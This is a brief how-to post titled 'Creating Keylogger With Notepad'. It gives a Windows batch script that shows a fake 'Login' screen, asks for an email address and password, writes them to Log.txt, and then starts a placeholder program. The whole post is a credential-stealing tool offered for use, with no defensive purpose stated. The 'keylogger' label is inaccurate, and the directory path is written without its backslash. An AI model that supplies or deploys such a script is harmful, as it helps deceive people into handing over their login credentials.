Creating Keylogger With Notepad* Just open the notepad from the start menu. Copy and paste the below given code into the notepad. @echo off color a title Login cls echo Please Enter Your Email Address And Password echo. echo. cd “C:Activity” set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” >> Log.txt start >>Program Here<< exit Save this file on the desktop as a logs.bat file.